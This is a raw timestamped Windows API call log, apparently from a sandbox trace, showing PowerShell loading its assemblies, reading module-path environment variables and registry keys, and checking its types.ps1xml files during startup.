	[0462.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0462.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0462.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0462.874] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0462.914] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0462.914] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0462.914] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0462.914] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0462.914] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0462.915] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0463.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0463.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0463.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0463.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0463.951] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x15c
	[0463.953] CoCreateGuid (in: pguid=0x24db50 | out: pguid=0x24db50*(Data1=0xc5ba8b6c, Data2=0x2c5d, Data3=0x4200, Data4=([0]=0xa4, [1]=0x65, [2]=0x5, [3]=0x7a, [4]=0x5, [5]=0x97, [6]=0xdc, [7]=0x73))) returned 0x0
	[0463.954] CoTaskMemAlloc (cb=0x104) returned 0x1b91f0b0
	[0463.954] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0463.954] CoTaskMemFree (pv=0x1b91f0b0) 
	[0465.077] WinSqmIsOptedIn () returned 0x0
	[0465.078] CoTaskMemAlloc (cb=0x104) returned 0x1b91f0b0
	[0465.078] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0465.078] CoTaskMemFree (pv=0x1b91f0b0) 
	[0465.080] CoTaskMemAlloc (cb=0x104) returned 0x1b91f0b0
	[0465.080] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0465.080] CoTaskMemFree (pv=0x1b91f0b0) 
	[0465.080] CoTaskMemAlloc (cb=0x104) returned 0x1b91f0b0
	[0465.080] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0465.080] CoTaskMemFree (pv=0x1b91f0b0) 
	[0465.081] CoTaskMemAlloc (cb=0x104) returned 0x1b91f0b0
	[0465.081] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0465.081] CoTaskMemFree (pv=0x1b91f0b0) 
	[0465.081] CoTaskMemAlloc (cb=0x104) returned 0x1b91f0b0
	[0465.082] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0465.082] CoTaskMemFree (pv=0x1b91f0b0) 
	[0465.083] CoTaskMemAlloc (cb=0x104) returned 0x1b91f0b0
	[0465.083] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0465.083] CoTaskMemFree (pv=0x1b91f0b0) 
	[0465.083] CoTaskMemAlloc (cb=0x104) returned 0x1b91f0b0
	[0465.083] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0465.083] CoTaskMemFree (pv=0x1b91f0b0) 
	[0465.084] CoTaskMemAlloc (cb=0x104) returned 0x1b91f0b0
	[0465.084] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0465.084] CoTaskMemFree (pv=0x1b91f0b0) 
	[0465.087] CoTaskMemAlloc (cb=0x104) returned 0x1b91f0b0
	[0465.087] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0465.087] CoTaskMemFree (pv=0x1b91f0b0) 
	[0465.097] CoTaskMemAlloc (cb=0x104) returned 0x1b91f0b0
	[0465.097] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0465.097] CoTaskMemFree (pv=0x1b91f0b0) 
	[0465.101] CoTaskMemAlloc (cb=0x104) returned 0x1b91f0b0
	[0465.101] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0465.101] CoTaskMemFree (pv=0x1b91f0b0) 
	[0465.804] CoTaskMemAlloc (cb=0x104) returned 0x1b91f0b0
	[0465.804] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0465.804] CoTaskMemFree (pv=0x1b91f0b0) 
	[0467.431] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0467.432] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0467.432] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0467.432] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0467.996] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0467.996] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0467.996] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0467.997] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0467.997] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0467.997] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0467.997] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0467.998] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0467.998] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0467.998] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0467.998] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0467.998] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0468.001] CoTaskMemAlloc (cb=0x104) returned 0x1b91f0b0
	[0468.001] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x1b91f0b0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0468.001] CoTaskMemFree (pv=0x1b91f0b0) 
	[0468.002] CoTaskMemAlloc (cb=0xcc) returned 0x1b91d970
	[0468.002] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b91d970, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0468.003] CoTaskMemFree (pv=0x1b91d970) 
	[0468.003] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d6c8 | out: phkResult=0x24d6c8*=0x160) returned 0x0
	[0468.003] RegQueryValueExW (in: hKey=0x160, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x24d64c, lpData=0x0, lpcbData=0x24d648*=0x0 | out: lpType=0x24d64c*=0x2, lpData=0x0, lpcbData=0x24d648*=0x6c) returned 0x0
	[0468.424] CoTaskMemAlloc (cb=0x70) returned 0x404320
	[0468.424] RegQueryValueExW (in: hKey=0x160, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x24d61c, lpData=0x404320, lpcbData=0x24d618*=0x6c | out: lpType=0x24d61c*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x24d618*=0x6c) returned 0x0
	[0468.424] CoTaskMemFree (pv=0x404320) 
	[0468.424] CoTaskMemAlloc (cb=0xcc) returned 0x1b91d970
	[0468.424] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x1b91d970, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0468.425] CoTaskMemFree (pv=0x1b91d970) 
	[0468.425] CoTaskMemAlloc (cb=0xcc) returned 0x1b91d970
	[0468.425] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b91d970, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0468.425] CoTaskMemFree (pv=0x1b91d970) 
	[0468.428] RegCloseKey (hKey=0x160) returned 0x0
	[0468.428] CoTaskMemAlloc (cb=0xcc) returned 0x1b91d970
	[0468.428] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b91d970, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0468.429] CoTaskMemFree (pv=0x1b91d970) 
	[0468.429] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d6c8 | out: phkResult=0x24d6c8*=0x160) returned 0x0
	[0468.429] RegQueryValueExW (in: hKey=0x160, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x24d64c, lpData=0x0, lpcbData=0x24d648*=0x0 | out: lpType=0x24d64c*=0x0, lpData=0x0, lpcbData=0x24d648*=0x0) returned 0x2
	[0468.429] RegCloseKey (hKey=0x160) returned 0x0
	[0468.433] CoTaskMemAlloc (cb=0x20c) returned 0x457d90
	[0468.433] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x457d90 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0468.434] CoTaskMemFree (pv=0x457d90) 
	[0468.434] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x24d250, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0468.435] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0468.446] CoTaskMemAlloc (cb=0x104) returned 0x1b91f0b0
	[0468.446] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0468.446] CoTaskMemFree (pv=0x1b91f0b0) 
	[0468.448] CoTaskMemAlloc (cb=0x104) returned 0x1b91f0b0
	[0468.448] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0468.448] CoTaskMemFree (pv=0x1b91f0b0) 
	[0468.452] CoTaskMemAlloc (cb=0x104) returned 0x1b91f0b0
	[0468.452] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0468.452] CoTaskMemFree (pv=0x1b91f0b0) 
	[0468.452] CoTaskMemAlloc (cb=0x104) returned 0x1b91f0b0
	[0468.452] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0468.452] CoTaskMemFree (pv=0x1b91f0b0) 
	[0468.453] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d4b8 | out: phkResult=0x24d4b8*=0x30c) returned 0x0
	[0468.454] RegQueryValueExW (in: hKey=0x30c, lpValueName="path", lpReserved=0x0, lpType=0x24d4cc, lpData=0x0, lpcbData=0x24d4c8*=0x0 | out: lpType=0x24d4cc*=0x1, lpData=0x0, lpcbData=0x24d4c8*=0x74) returned 0x0
	[0468.455] RegQueryValueExW (in: hKey=0x30c, lpValueName="path", lpReserved=0x0, lpType=0x24d43c, lpData=0x0, lpcbData=0x24d438*=0x0 | out: lpType=0x24d43c*=0x1, lpData=0x0, lpcbData=0x24d438*=0x74) returned 0x0
	[0468.455] CoTaskMemAlloc (cb=0x78) returned 0x404320
	[0468.455] RegQueryValueExW (in: hKey=0x30c, lpValueName="path", lpReserved=0x0, lpType=0x24d40c, lpData=0x404320, lpcbData=0x24d408*=0x74 | out: lpType=0x24d40c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x24d408*=0x74) returned 0x0
	[0468.455] CoTaskMemFree (pv=0x404320) 
	[0468.455] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x24d180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0468.455] SetErrorMode (uMode=0x1) returned 0x1
	[0468.455] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x24d390 | out: lpFileInformation=0x24d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0468.455] SetErrorMode (uMode=0x1) returned 0x1
	[0468.982] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x24d180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0468.982] SetErrorMode (uMode=0x1) returned 0x1
	[0468.982] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d390 | out: lpFileInformation=0x24d390*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0468.983] SetErrorMode (uMode=0x1) returned 0x1
	[0468.987] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x24d180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0468.987] SetErrorMode (uMode=0x1) returned 0x1
	[0468.987] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d390 | out: lpFileInformation=0x24d390*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0468.987] SetErrorMode (uMode=0x1) returned 0x1
	[0468.991] CoTaskMemAlloc (cb=0x104) returned 0x1b91f0b0
	[0468.991] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0468.991] CoTaskMemFree (pv=0x1b91f0b0) 
	[0468.999] CoTaskMemAlloc (cb=0x104) returned 0x1b91f0b0
	[0468.999] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0468.999] CoTaskMemFree (pv=0x1b91f0b0) 
	[0469.000] GetACP () returned 0x4e4
